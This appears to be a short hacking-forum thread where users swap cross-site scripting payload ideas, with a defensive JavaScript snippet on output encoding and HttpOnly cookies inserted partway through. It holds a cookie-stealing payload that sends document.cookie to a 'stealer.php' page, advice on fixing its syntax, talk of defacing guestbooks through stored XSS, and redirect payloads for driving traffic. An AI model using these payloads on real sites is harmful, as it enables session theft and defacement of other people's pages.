
XSS - Ideas


ghost's Avatar

XSS - what can we do with it.

<script>document.location=stealer.php?c=document.cookie</script>

Anyone got any other ideas? I'll post some CSRF later when I have time.


nanoymaster's Avatar
the master of nanoy(.org)

A personal fave…

<script>document.location='http://www.nanoy.org';</script> but you could always do a simple alert: <script>alert('pwnt…or_whatever!')</script>

;)


ghost's Avatar

mozzer wrote: <script>document.location=stealer.php?c=document.cookie</script>

That wouldn't do what you probably want it to. For one thing, quotation marks (single or double) are required around the target location, which is ended after c=. After the location, since you want to include the user's cookie, you should put an addition sign before it. You should also have brackets around the target location (including document.cookie) instead of an equal sign.

In answer to your question, it is also possible to deface sites that have more severe cross-site scripting vulnerabilities (e.g. many guestbook scripts), more specifically sites that have vulnerable fields that are shown back to users after input is received. Some may refer to that as permanent XSS.
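
The guestbook case described in the post above, seen from the defending side. This is an added example, not code from any poster in this thread; the function names, sample entries and cookie name are all assumptions made for illustration. It renders the same stored entries once without output encoding and once with it, and builds a session cookie header that page scripts cannot read.

```javascript
// Added example: guestbook rendering, vulnerable vs. hardened.
// All identifiers here are hypothetical, not taken from a real guestbook script.

// Characters that can change the HTML parsing context in element content
// or in quoted attribute values.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: visitor input is concatenated into markup as-is, so a stored
// <script> element is parsed and executed for every later visitor.
function renderEntryUnsafe(entry) {
  return `<li><b>${entry.name}</b>: ${entry.message}</li>`;
}

// Hardened: every visitor-controlled field is encoded at output time,
// so the browser displays the markup as text instead of running it.
function renderEntrySafe(entry) {
  return `<li><b>${escapeHtml(entry.name)}</b>: ${escapeHtml(entry.message)}</li>`;
}

// Defense in depth: HttpOnly keeps the session cookie out of document.cookie,
// so an injected script that slips past encoding cannot read it.
function sessionCookieHeader(name, value) {
  return `Set-Cookie: ${name}=${encodeURIComponent(value)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Constructed sample entries, using payload shapes quoted in this thread.
const SAMPLE_ENTRIES = [
  { name: "visitor1", message: '<script>window.location="http://www.yoursite.com"</script>' },
  { name: "visitor2", message: "<script>alert('pwnt')</script>" },
  { name: "visitor3", message: "Nice site & great guestbook" },
];

function renderGuestbook(entries, render) {
  return `<ul>\n${entries.map(render).join("\n")}\n</ul>`;
}

console.log("unsafe:\n" + renderGuestbook(SAMPLE_ENTRIES, renderEntryUnsafe));
console.log("safe:\n" + renderGuestbook(SAMPLE_ENTRIES, renderEntrySafe));
console.log(sessionCookieHeader("sid", "constructed-session-id"));
```

Encoding at output time covers HTML element content and quoted attributes only; values placed inside a script block, a URL or a style need the encoding for that context.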


ghost's Avatar

<script>window.location="http://www.yoursite.com"</script>

Easy way to generate traffic to any site you want.


ghost's Avatar

I'm new to webhacking and I'm interested in "<script>window.location="http://www.yoursite.com"</script>". Where would I input that? In my page's source or in the browser like other techniques?